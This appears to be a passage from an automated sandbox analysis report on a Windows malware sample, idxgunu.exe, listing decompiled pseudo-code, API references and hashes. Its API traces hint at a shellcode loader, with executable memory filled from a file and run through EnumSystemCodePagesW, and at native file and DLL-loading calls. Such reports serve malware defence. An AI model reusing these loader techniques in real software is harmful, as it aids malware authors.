						 *0x12c30c4 = CreateWindowExW(0, L"CLClass", L"Clock", 0xcf0000, 0x80000000, 0x80000000, 0xc8, 0xc8, 0, 0, 0, 0);
						if(E012C1130() != 0) {
							_t38 = LoadMenuW(0, 0x100);
							 *0x12c30c8 = _t38;
							SetMenu( *0x12c30c4, _t38);
							E012C11D0();
							E012C1290();
							UpdateWindow( *0x12c30c4);
							while(GetMessageW( &_v44, 0, 0, 0) != 0) {
								TranslateMessage( &_v44);
								DispatchMessageW( &_v44);
							}
							KillTimer( *0x12c30c4, 1);
							DeleteObject( *0x12c30bc);
						}
					}
				}
				return 0;
			}

0x012c1339
0x012c133c
0x012c1343
0x012c134e
0x012c1356
0x012c135b
0x012c1369
0x012c1387
0x012c138d
0x012c1391
0x012c13a0
0x012c13a3
0x012c13aa
0x012c13b5
0x012c13c0
0x012c13cd
0x012c13d0
0x012c13d1
0x012c13d9
0x012c13e2
0x012c13ea
0x012c13f2
0x012c13fd
0x012c1407
0x012c141a
0x012c144d
0x012c1457
0x012c1467
0x012c1473
0x012c1480
0x012c148d
0x012c1492
0x012c1498
0x012c149d
0x012c14a8
0x012c14c2
0x012c14d4
0x012c14da
0x012c14e8
0x012c14f4
0x012c1500
0x012c1500
0x012c1473
0x012c141a
0x012c150e

APIs

GetConsoleWindow.KERNELBASE(00000000), ref: 012C133C
ShowWindow.USER32(00000000), ref: 012C1343
malloc.MSVCRT ref: 012C134E
memset.MSVCRT ref: 012C1369
CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 012C1387
GetFileSize.KERNEL32(00000000,00000000), ref: 012C1391
VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000040), ref: 012C13A3
ReadFile.KERNELBASE(00000000,00000000,?,?,00000000), ref: 012C13B5
EnumSystemCodePagesW.KERNELBASE(00000000,00000000), ref: 012C13D9
free.MSVCRT(?), ref: 012C13E2
#17.COMCTL32 ref: 012C13EA
RegisterClassW.USER32 ref: 012C1411
CreateWindowExW.USER32 ref: 012C1461
LoadMenuW.USER32 ref: 012C1480
SetMenu.USER32(00000000), ref: 012C1492
UpdateWindow.USER32 ref: 012C14A8
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 012C14BE
TranslateMessage.USER32(?), ref: 012C14D4
DispatchMessageW.USER32 ref: 012C14DA
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 012C14E6
KillTimer.USER32(00000001), ref: 012C14F4
DeleteObject.GDI32 ref: 012C1500

Strings

Clock, xrefs: 012C1441
CLClass, xrefs: 012C1446

Memory Dump Source

Source File: 00000001.00000002.310462681.00000000012C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012C0000, based on PE: true

Associated: 00000001.00000002.310458869.00000000012C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.310466526.00000000012C2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.310485063.00000000012C4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_12c0000_idxgunu.jbxd

Similarity

API ID: MessageWindow$File$CreateMenu$AllocClassCodeConsoleDeleteDispatchEnumKillLoadObjectPagesReadRegisterShowSizeSystemTimerTranslateUpdateVirtualfreemallocmemset
String ID: CLClass$Clock
API String ID: 4172311262-801714703
Opcode ID: 7e4464aec2fa185386ad60fe55fed5716907ebf71803f7a82f2d5eebe90f6213
Instruction ID: de4dfac79bc2b23223790d66267f1f20647ec3cef26ff2565c1fbd967a76db1c
Opcode Fuzzy Hash: 7e4464aec2fa185386ad60fe55fed5716907ebf71803f7a82f2d5eebe90f6213
Instruction Fuzzy Hash: AB41DD71A40205FFEB31ABA0BC0EF9A7B79FB64B40F10411AF705A61C5DEB0A014CB24

Uniqueness

Uniqueness Score: -1.00%

Function 012C1000 Relevance: 15.1, APIs: 10, Instructions: 74
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 55%

			_entry_(void* __ebx, void* __edi, void* __esi) {
				signed int _v8;
				intOrPtr* _v24;
				intOrPtr _v28;
				char _v32;
				char _v36;
				int _v40;
				char _v44;
				char _v48;
				intOrPtr _v52;
				struct HWND__* _t28;
				int _t29;
				intOrPtr* _t30;
				intOrPtr _t37;
				intOrPtr _t45;

				_push(0xffffffff);
				_push(0x12c21d8);
				_push(0x12c152d);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t45;
				_v28 = _t45 - 0x20;
				_v8 = _v8 & 0x00000000;
				__set_app_type(1);
				 *0x12c30e8 =  *0x12c30e8 | 0xffffffff;
				 *0x12c30ec =  *0x12c30ec | 0xffffffff;
				 *(__p__fmode()) =  *0x12c305c;
				 *(__p__commode()) =  *0x12c3058;
				 *0x12c30f0 = _adjust_fdiv;
				E012C1125( *_adjust_fdiv);
				if( *0x12c3010 == 0) {
					__setusermatherr(E012C1122);
				}
				E012C1110();
				L012C1527();
				_v44 =  *0x12c3054;
				_t28 =  &_v32;
				__imp____wgetmainargs(_t28,  &_v48,  &_v36,  *0x12c3050,  &_v44, 0x12c3008, 0x12c300c); // executed
				L012C1527();
				__imp____p___winitenv(0x12c3000, 0x12c3004);
				 *_t28 = _v36;
				_push(_v36);
				_t29 = E012C1330(_t28, _v32, _v48); // executed
				_v40 = _t29;
				exit(_t29);
				_t30 = _v24;
				_t37 =  *((intOrPtr*)( *_t30));
				_v52 = _t37;
				_push(_t30);
				_push(_t37);
				L012C1521();
				return _t30;
			}

0x012c1003
0x012c1005
0x012c100a
0x012c1015
0x012c1016
0x012c1023
0x012c1026
0x012c102c
0x012c1033
0x012c103a
0x012c104d
0x012c105b
0x012c1064
0x012c1069
0x012c1075
0x012c107c
0x012c1082
0x012c1083
0x012c1092
0x012c109c
0x012c10b1
0x012c10b5
0x012c10c5
0x012c10ca
0x012c10d3
0x012c10d5
0x012c10de
0x012c10e6
0x012c10ea
0x012c10f0
0x012c10f5
0x012c10f7
0x012c10fa
0x012c10fb
0x012c10fc
0x012c1103

APIs

__set_app_type.MSVCRT ref: 012C102C
__p__fmode.MSVCRT ref: 012C1041
__p__commode.MSVCRT ref: 012C104F
__setusermatherr.MSVCRT ref: 012C107C
_initterm.MSVCRT ref: 012C1092
__wgetmainargs.KERNELBASE ref: 012C10B5
_initterm.MSVCRT ref: 012C10C5
__p___winitenv.MSVCRT ref: 012C10CA
exit.MSVCRT ref: 012C10EA
_XcptFilter.MSVCRT ref: 012C10FC

Memory Dump Source

Source File: 00000001.00000002.310462681.00000000012C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012C0000, based on PE: true

Associated: 00000001.00000002.310458869.00000000012C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.310466526.00000000012C2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.310485063.00000000012C4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_12c0000_idxgunu.jbxd

Similarity

API ID: _initterm$FilterXcpt__p___winitenv__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargsexit
String ID:
API String ID: 1779410220-0
Opcode ID: c3c9a83fc360964074bb0ccf8db1abda57efa3064a6567d59457aed35dd8c16b
Instruction ID: 170248a3e74e54f75fb06a7ecd64e644de4922edb065e1657add04246b1a6494
Opcode Fuzzy Hash: c3c9a83fc360964074bb0ccf8db1abda57efa3064a6567d59457aed35dd8c16b
Instruction Fuzzy Hash: AD314D76910205EFCB24DFA4F84AAAD7BB9FB19B20F10461EE712A3294CB759414CF64

Uniqueness

Uniqueness Score: -1.00%

Function 01421405 Relevance: 10.7, APIs: 7, Instructions: 192
filememoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,80000000,00000007,00000000,00000003,00000080,00000000,00000000,7F91A078,00000000,7F951704,00000000,7FE1F1FB,00000000,7FE7F840,00000000), ref: 014214CE
VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,?,?,?,?,?,?,?,0142161D,7FAB7E30,01420EEC,00000000,00000040), ref: 014214F8
ReadFile.KERNELBASE(00000000,00000000,00000000,7FAB7E30,00000000,?,?,?,?,?,?,?,0142161D,7FAB7E30,01420EEC,00000000), ref: 0142150F
VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,?,?,?,?,0142161D,7FAB7E30,01420EEC,00000000,00000040), ref: 01421533
FindCloseChangeNotification.KERNELBASE(00000000,01420AE1,00000000,?,?,?,?,?,?,?,0142161D,7FAB7E30,01420EEC,00000000,00000040,?), ref: 014215A3
VirtualFree.KERNELBASE(00000000,00000000,00008000,01420AE1,00000000,?,?,?,?,?,?,?,0142161D,7FAB7E30,01420EEC,00000000), ref: 014215AE
VirtualFree.KERNELBASE(01420AE1,00000000,00008000,?,?,?,?,?,?,?,0142161D,7FAB7E30,01420EEC,00000000,00000040,?), ref: 014215F5

Memory Dump Source

Source File: 00000001.00000002.310555216.0000000001420000.00000040.00001000.00020000.00000000.sdmp, Offset: 01420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1420000_idxgunu.jbxd

Similarity

API ID: Virtual$AllocFileFree$ChangeCloseCreateFindNotificationRead
String ID:
API String ID: 656311269-0
Opcode ID: b9484c60b3f68cf64affa77f505ca874ec3c94c20b6fe36455b0191e2b16791d
Instruction ID: ce0e4f82f0d3c1b4eb87ba0a11b42a64b71d98c1bba6f9ecd7b7250337aa766e
Opcode Fuzzy Hash: b9484c60b3f68cf64affa77f505ca874ec3c94c20b6fe36455b0191e2b16791d
Instruction Fuzzy Hash: 6151A371E00229ABDB209FA5DC44FAFBBB8EF18710F54455AFA01F7250D7749A81CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 01420865 Relevance: 9.2, APIs: 4, Strings: 1, Instructions: 425
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 01420A41

Strings

D, xrefs: 01420897

Memory Dump Source

Source File: 00000001.00000002.310555216.0000000001420000.00000040.00001000.00020000.00000000.sdmp, Offset: 01420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1420000_idxgunu.jbxd

Similarity

API ID: CreateProcess
String ID: D
API String ID: 963392458-2746444292
Opcode ID: 8cac6fe03b55816757256ea8dd2d28f620159d43486ce3136379ffc11c4b74c0
Instruction ID: 6a6da3b7f6bf9b790dd237019873875e66cd92819c24c6644992b3fcbbe66745
Opcode Fuzzy Hash: 8cac6fe03b55816757256ea8dd2d28f620159d43486ce3136379ffc11c4b74c0
Instruction Fuzzy Hash: E502F370900229EFEF15CF98C985BAEBBF5BF08305F60415AE505BB2A1D774AA81CF10

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 01420149 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.310555216.0000000001420000.00000040.00001000.00020000.00000000.sdmp, Offset: 01420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1420000_idxgunu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 99f7f8a727c11264525f8cb6de1cb7337fd0f498ccee2e52288f3cdfd2a68309
Instruction ID: 2d1502c2c3c2f075200906465cd062816b17748c20ddda8e46e68771135cebd7
Opcode Fuzzy Hash: 99f7f8a727c11264525f8cb6de1cb7337fd0f498ccee2e52288f3cdfd2a68309
Instruction Fuzzy Hash: C2218E36600228AFD710DF6DC8849BEB7E9EF98264F54842AF946DB351E674EE40CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0142007A Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.310555216.0000000001420000.00000040.00001000.00020000.00000000.sdmp, Offset: 01420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1420000_idxgunu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 13604c29325f2004163b2aa178d0763ca0500bc422fb4823b0b3684db1ed90d5
Instruction ID: 9e0bda758904fd7e25e1da92f4386f16f3c62bfeea0f44ebe47e56cdf11a3e30
Opcode Fuzzy Hash: 13604c29325f2004163b2aa178d0763ca0500bc422fb4823b0b3684db1ed90d5
Instruction Fuzzy Hash: 87E0DF35320646AFDB00CBA8DC81D46B3F8EB08228B544290F912D73E0E678ED40DA10

Uniqueness

Uniqueness Score: -1.00%

Function 01420019 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.310555216.0000000001420000.00000040.00001000.00020000.00000000.sdmp, Offset: 01420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1420000_idxgunu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc0bda6141fd36cf9d678f032adb249b3112c4c6bd4a6d514cefce2705d38c4d
Instruction ID: d2643605785f92a33979cf27f043d7a0ffcbb525da37216660957262ba0ffbb9
Opcode Fuzzy Hash: dc0bda6141fd36cf9d678f032adb249b3112c4c6bd4a6d514cefce2705d38c4d
Instruction Fuzzy Hash: 9EE04F722105609FD7629A5AD800CA7F7E8EB986B07854426F94997631C635FC40C794

Uniqueness

Uniqueness Score: -1.00%

Function 01420005 Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.310555216.0000000001420000.00000040.00001000.00020000.00000000.sdmp, Offset: 01420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1420000_idxgunu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
Instruction ID: 01513cdb45ce42654985ae443ff07ed2023d2f9c2cc80418f216d1c85a703bac
Opcode Fuzzy Hash: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
Instruction Fuzzy Hash: ECC00139661A40CFCA55CF08C194E00B3F4FB5D760B068491E906CB732C234ED40DA40

Uniqueness

Uniqueness Score: -1.00%

Function 012C11D0 Relevance: 12.1, APIs: 8, Instructions: 63
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 40%

			E012C11D0() {
				struct HMENU__* _t1;
				struct HMENU__* _t21;

				_t1 = GetSubMenu( *0x12c30c8, 0);
				_t21 = _t1;
				if(_t21 != 0) {
					_push(8);
					if( *0x12c30cc == 0) {
						CheckMenuRadioItem(_t21, 0x101, 0x102, 0x102, ??);
						_push(0);
					} else {
						CheckMenuRadioItem(_t21, 0x101, 0x102, 0x101, ??);
						_push(1);
					}
					EnableMenuItem(_t21, 0x103, ??);
					asm("sbb eax, eax");
					CheckMenuItem(_t21, 0x104,  ~( *0x12c30d4) & 0x00000008);
					asm("sbb eax, eax");
					CheckMenuItem(_t21, 0x113,  ~( *0x12c30d0) & 0x00000008);
					asm("sbb eax, eax");
					CheckMenuItem(_t21, 0x105,  ~( *0x12c30d8) & 0x00000008);
					asm("sbb eax, eax");
					return CheckMenuItem(_t21, 0x106,  ~( *0x12c30dc) & 0x00000008);
				}
				return _t1;
			}

0x012c11d9
0x012c11df
0x012c11e3
0x012c11f0
0x012c11f2
0x012c121e
0x012c1224
0x012c11f4
0x012c1204
0x012c120a
0x012c120a
0x012c122c
0x012c1240
0x012c124c
0x012c1255
0x012c1261
0x012c126a
0x012c1276
0x012c127f
0x00000000
0x012c128d
0x012c128f

APIs

GetSubMenu.USER32 ref: 012C11D9
CheckMenuRadioItem.USER32 ref: 012C1204
CheckMenuRadioItem.USER32 ref: 012C121E
EnableMenuItem.USER32 ref: 012C122C
CheckMenuItem.USER32(00000000,00000104,?), ref: 012C124C
CheckMenuItem.USER32(00000000,00000113,?), ref: 012C1261
CheckMenuItem.USER32(00000000,00000105,?), ref: 012C1276
CheckMenuItem.USER32(00000000,00000106,?), ref: 012C128B

Memory Dump Source

Source File: 00000001.00000002.310462681.00000000012C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012C0000, based on PE: true

Associated: 00000001.00000002.310458869.00000000012C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.310466526.00000000012C2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.310485063.00000000012C4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_12c0000_idxgunu.jbxd

Similarity

API ID: Menu$Item$Check$Radio$Enable
String ID:
API String ID: 2816281541-0
Opcode ID: 76028d7df57658f2d462ff41fb464982544b8bbc04283a19547b94144826db08
Instruction ID: 4edd25ec45b848f465277f898888f31be2f47b5b0fde5f0bd5c8cdde01ddb3bb
Opcode Fuzzy Hash: 76028d7df57658f2d462ff41fb464982544b8bbc04283a19547b94144826db08
Instruction Fuzzy Hash: D51184363E0211BEE621DA28FC4FFB936A9A795F02F004105FB40E61C5CAEC94814B61

Uniqueness

Uniqueness Score: -1.00%

Function 012C1130 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41
timewindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E012C1130() {
				short _v516;
				int _t4;

				KillTimer( *0x12c30c4, 1);
				if( *0x12c30d8 == 0) {
					_t4 = 0x3e8;
				} else {
					_t4 =  !=  ? 0x32 : 0x1f4;
				}
				if(SetTimer( *0x12c30c4, 1, _t4, 0) != 0) {
					return 1;
				} else {
					LoadStringW( *0x12c30c0, 0x10c,  &_v516, 0xff);
					MessageBoxW(0, L"No available timers",  &_v516, 0x30);
					return 0;
				}
			}

0x012c1141
0x012c114e
0x012c1166
0x012c1150
0x012c1161
0x012c1161
0x012c117e
0x012c11c1
0x012c1180
0x012c1197
0x012c11ad
0x012c11b8
0x012c11b8

APIs

KillTimer.USER32(00000001), ref: 012C1141
SetTimer.USER32(00000001,000003E8,00000000), ref: 012C1176
LoadStringW.USER32(0000010C,?,000000FF), ref: 012C1197
MessageBoxW.USER32(00000000,No available timers,?,00000030), ref: 012C11AD

Strings

No available timers, xrefs: 012C11A6

Memory Dump Source

Source File: 00000001.00000002.310462681.00000000012C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012C0000, based on PE: true

Associated: 00000001.00000002.310458869.00000000012C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.310466526.00000000012C2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.310485063.00000000012C4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_12c0000_idxgunu.jbxd

Similarity

API ID: Timer$KillLoadMessageString
String ID: No available timers
API String ID: 1144026915-3294945137
Opcode ID: 3c5bd5aa1c24db96402adeb49e5bec7ab0b2e7dd7488468f47f5530927814bc6
Instruction ID: 4c2aac2d558f32ed3b1c07bb4fe1c163cc9aa775988f0c22c6d7d34e43652215
Opcode Fuzzy Hash: 3c5bd5aa1c24db96402adeb49e5bec7ab0b2e7dd7488468f47f5530927814bc6
Instruction Fuzzy Hash: 07011931390205EFFB31DA18FC4EBA576A9F740B02F000269BB08960C6EAE69955DB56

Uniqueness

Uniqueness Score: -1.00%

Function 012C1290 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 68%

			E012C1290() {
				short _v516;
				int _t23;
				signed int _t27;
				void* _t29;

				_t27 = 0;
				if( *0x12c30dc != 0) {
					_t23 =  &_v516;
					0x12c0000(_t23);
					_t27 = GetDateFormatW(0x400, 2, 0, 0,  &_v516, _t23);
					if(_t27 != 0) {
						 *((intOrPtr*)(_t29 + _t27 * 2 - 0x202)) = 0x2d0020;
						 *((short*)(_t29 + _t27 * 2 - 0x1fe)) = 0x20;
						_t27 = _t27 + 2;
						 *((short*)(_t29 + _t27 * 2 - 0x200)) = 0;
					}
				}
				LoadStringW(0, 0x10c,  &(( &_v516)[_t27]), 0xff - _t27);
				return SetWindowTextW( *0x12c30c4,  &_v516);
			}

0x012c1293
0x012c12a1
0x012c12a3
0x012c12aa
0x012c12c8
0x012c12cc
0x012c12ce
0x012c12de
0x012c12e6
0x012c12eb
0x012c12eb
0x012c12cc
0x012c130c
0x012c1328

APIs

GetDateFormatW.KERNEL32(00000400,00000002,00000000,00000000,?,00000000), ref: 012C12C2
LoadStringW.USER32(00000000,0000010C,?,000000FF), ref: 012C130C
SetWindowTextW.USER32(?), ref: 012C131F

Strings

, xrefs: 012C12CE

Memory Dump Source

Source File: 00000001.00000002.310462681.00000000012C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012C0000, based on PE: true

Associated: 00000001.00000002.310458869.00000000012C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.310466526.00000000012C2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.310485063.00000000012C4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_12c0000_idxgunu.jbxd

Similarity

API ID: DateFormatLoadStringTextWindow
String ID:
API String ID: 2404250852-3916222277
Opcode ID: a4d5f5085dafe729c08c5bfb441dbd101b4b03b86dbf79aa2007c10d912793e5
Instruction ID: a8bca086c60c6cca6756353fb7111cd7af327a4a74f1cbadd5364c2e1178289d
Opcode Fuzzy Hash: a4d5f5085dafe729c08c5bfb441dbd101b4b03b86dbf79aa2007c10d912793e5
Instruction Fuzzy Hash: 9701847464030ADEFB249E64EC4EFBA3768FB04701F0041BDAB05D6196EB7059148F51

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: idxgunu.exePID: 4620, Parent PID: 1980COMMON

Execution Graph

Execution Coverage:	4.2%
Dynamic/Decrypted Code Coverage:	2.7%
Signature Coverage:	5%
Total number of Nodes:	555
Total number of Limit Nodes:	71

Executed Functions

Function 0041A410 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 37%

			E0041A410(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E0041AF60(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t4 =  &_a40; // 0x414a31
				_t6 =  &_a32; // 0x414d72
				_t12 =  &_a8; // 0x414d72
				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36,  *_t4); // executed
				return _t18;
			}

0x0041a413
0x0041a41f
0x0041a427
0x0041a42c
0x0041a432
0x0041a44d
0x0041a455
0x0041a459

APIs

NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A455

Strings

rMA, xrefs: 0041A432, 0041A440
1JA, xrefs: 0041A42C, 0041A438
rMA, xrefs: 0041A44D, 0041A454

Memory Dump Source

Source File: 00000003.00000002.396348614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_idxgunu.jbxd

Yara matches

Similarity

API ID: FileRead
String ID: 1JA$rMA$rMA
API String ID: 2738559852-782607585
Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction ID: c6e97d42c3e85b78cd3a41c20c82dd28da71633a8e67c8174f08c115ef6e08ba
Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction Fuzzy Hash: 87F0B7B2200208AFCB14DF89DC81EEB77ADEF8C754F158249BE1D97241D630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041A40A Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 35
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 25%

			E0041A40A(void* __eax, intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40) {
				void* _t20;
				void* _t29;
				void* _t30;
				intOrPtr* _t31;
				signed int _t33;

				asm("gs lodsd");
				_t33 =  *(__eax - 0x74aab6f9) * 0x8458bec;
				_t15 = _a4;
				_t31 = _a4 + 0xc48;
				E0041AF60(_t29, _t15, _t31,  *((intOrPtr*)(_t15 + 0x10)), 0, 0x2a);
				_t5 =  &_a40; // 0x414a31
				_t7 =  &_a32; // 0x414d72
				_t13 =  &_a8; // 0x414d72
				_t20 =  *((intOrPtr*)( *_t31))( *_t13, _a12, _a16, _a20, _a24, _a28,  *_t7, _a36,  *_t5, _t30, _t33); // executed
				return _t20;
			}

0x0041a40a
0x0041a40c
0x0041a413
0x0041a41f
0x0041a427
0x0041a42c
0x0041a432
0x0041a44d
0x0041a455
0x0041a459

APIs

NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A455

Strings

rMA, xrefs: 0041A432, 0041A440
1JA, xrefs: 0041A42C, 0041A438
rMA, xrefs: 0041A44D, 0041A454

Memory Dump Source

Source File: 00000003.00000002.396348614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_idxgunu.jbxd

Yara matches

Similarity

API ID: FileRead
String ID: 1JA$rMA$rMA
API String ID: 2738559852-782607585
Opcode ID: c0e45899e5ff38351a7657155f39c2eb5ba961495a8cb2fd0629dc440d75992a
Instruction ID: 19ff9683b3dc3af87ec081a3c22ea504c3d46a9b2486d5d163cbd951532a006a
Opcode Fuzzy Hash: c0e45899e5ff38351a7657155f39c2eb5ba961495a8cb2fd0629dc440d75992a
Instruction Fuzzy Hash: C9F01DB2200108AFCB04DF89CC45EEB77ADEF8C314F158249BA1D97251C630E811CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0040ACF0 Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0040ACF0(void* __ebx, void* __esi, void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* __ebp;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t32;
				void* _t33;
				void* _t34;

				_t25 = _a8;
				_v8 =  &_v536;
				_t15 = E0041CC50( &_v12, 0x104, _a8);
				_t33 = _t32 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041D070(_v8, _t25, __eflags, _v8);
					_t34 = _t33 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041D2F0(__ebx, __esi,  &_v12, 0);
						_t34 = _t34 + 8;
					}
					_t18 = E0041B4A0(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}

0x0040acf9
0x0040ad0c
0x0040ad0f
0x0040ad14
0x0040ad19
0x0040ad23
0x0040ad28
0x0040ad2b
0x0040ad2d
0x0040ad35
0x0040ad3a
0x0040ad3a
0x0040ad41
0x0040ad49
0x0040ad4c
0x0040ad4e
0x0040ad62
0x00000000
0x0040ad64
0x0040ad6a
0x0040ad1e
0x0040ad1e
0x0040ad1e

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD62

Memory Dump Source

Source File: 00000003.00000002.396348614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_idxgunu.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
Instruction ID: bd03027937dafe21d6f438616a486266aae6a772261e1344982784e00def1180
Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
Instruction Fuzzy Hash: 80015EB5E0020DBBDF10DBA1DC42FDEB3789F54308F0045AAA908A7281F634EB548B95

Uniqueness

Uniqueness Score: -1.00%

Function 0041A35A Relevance: 1.5, APIs: 1, Instructions: 41
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 79%

			E0041A35A(void* __eax, intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t24;
				void* _t34;

				asm("adc al, 0x55");
				_t18 = _a4;
				_t5 = _t18 + 0xc40; // 0xc40
				E0041AF60(_t34, _a4, _t5,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t24 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t24;
			}

0x0041a35f
0x0041a363
0x0041a36f
0x0041a377
0x0041a3ad
0x0041a3b1

APIs

